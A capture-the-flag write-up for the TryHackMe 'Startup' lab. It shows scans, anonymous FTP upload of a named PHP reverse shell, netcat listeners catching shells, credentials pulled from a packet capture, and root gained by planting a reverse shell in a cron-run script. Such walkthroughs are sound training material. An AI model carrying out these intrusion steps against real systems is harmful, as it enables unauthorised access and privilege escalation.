THM: Startup

Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.169.50 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-21 01:07 GMT
Nmap scan report for 10.10.169.50
Host is up (0.021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp [NSE: writeable]
| -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
|_-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.11.18.78
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Maintenance
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.02 seconds
FTP
Let's start with FTP; according to nmap it accepts anonymous logins
# ftp -A 10.10.169.50
Connected to 10.10.169.50.
220 (vsFTPd 3.0.3)
Name (10.10.169.50:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x 3 65534 65534 4096 Nov 12 2020 .
drwxr-xr-x 3 65534 65534 4096 Nov 12 2020 ..
-rw-r--r-- 1 0 0 5 Nov 12 2020 .test.log
drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp
-rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
It is indeed readable. The ftp directory was empty, but it was world-writable. Looking through the other files there was nothing of note
Website
The website just shows a simple message
So let's run gobuster
# gobuster dir -u http://10.10.169.50 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.169.50
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/files (Status: 301) [Size: 312] [--> http://10.10.169.50/files/]
/index.html (Status: 200) [Size: 808]
/server-status (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Checking out the files directory we can see a listing that matches the FTP directory
Knowing that this directory is writable, we can upload a reverse shell via FTP. In this case I use the Pentest Monkey PHP reverse shell. It is then just a case of starting a listener and browsing to the uploaded shell to trigger the connection
# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.169.50] 59154
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
01:19:46 up 22 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
Reverse shell
Looking around the box, we don't have enough rights to read the user flag, so it's a case of finding something we can escalate with. There are a couple of interesting files on the system, including a pcap file in a directory called incidents, so we transfer that over
$ ls
bin
boot
dev
etc
home
incidents
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
recipe.txt
root
run
sbin
snap
srv
sys
tmp
usr
vagrant
var
vmlinuz
vmlinuz.old
$ cd incidents
$ ls
suspicious.pcapng
$ python3 -m http.server 8080
Looking through the capture in Wireshark we can see traffic that looks like it is from a reverse shell. Following the data we find what looks like a username and password
Logging in with the discovered credentials via SSH gets us the user flag
# ssh lennie@10.10.169.50
The authenticity of host '10.10.169.50 (10.10.169.50)' can't be established.
ED25519 key fingerprint is SHA256:v4Yk83aT8xnOB+pdfmlLuJY1ztw/bXsFd1cl/xV07xY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.169.50' (ED25519) to the list of known hosts.
lennie@10.10.169.50's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-190-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
44 packages can be updated.
30 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
$ ls
Documents scripts user.txt
$ cat user.txt
THM{0******************************9}
Privilege escalation
Looking around in lennie's home directory there are some scripts, however they are not owned by him
$ ls -lah
total 24K
drwx------ 5 lennie lennie 4.0K Mar 22 16:18 .
drwxr-xr-x 3 root root 4.0K Nov 12 2020 ..
drwx------ 2 lennie lennie 4.0K Mar 22 16:18 .cache
drwxr-xr-x 2 lennie lennie 4.0K Nov 12 2020 Documents
drwxr-xr-x 2 root root 4.0K Nov 12 2020 scripts
-rw-r--r-- 1 lennie lennie 38 Nov 12 2020 user.txt
$ cd scripts
$ ls -lah
total 16K
drwxr-xr-x 2 root root 4.0K Nov 12 2020 .
drwx------ 5 lennie lennie 4.0K Mar 22 16:18 ..
-rwxr-xr-x 1 root root 77 Nov 12 2020 planner.sh
-rw-r--r-- 1 root root 1 Mar 22 16:21 startup_list.txt
Looking inside the planner script we can see it calls another script, /etc/print.sh, which we do have write access to
$ cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
$ cat /etc/print.sh
#!/bin/bash
echo "Done!"
$ ls -l /etc/print.sh
-rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh
Based on the unusual ownership we guess that either a process triggers the script or it is run from cron, so we put a reverse shell line into /etc/print.sh
and start a listener. Almost straight away we get a shell back as root, so we can read the root flag. Checking root's crontab confirms our guess about how it worked
# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.169.50] 49088
bash: cannot set terminal process group (1434): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@startup:~# cat /root/root.txt
cat /root/root.txt
THM{f******************************d}
root@startup:~#
root@startup:~# crontab -l
crontab -l
* * * * * /home/lennie/scripts/planner.sh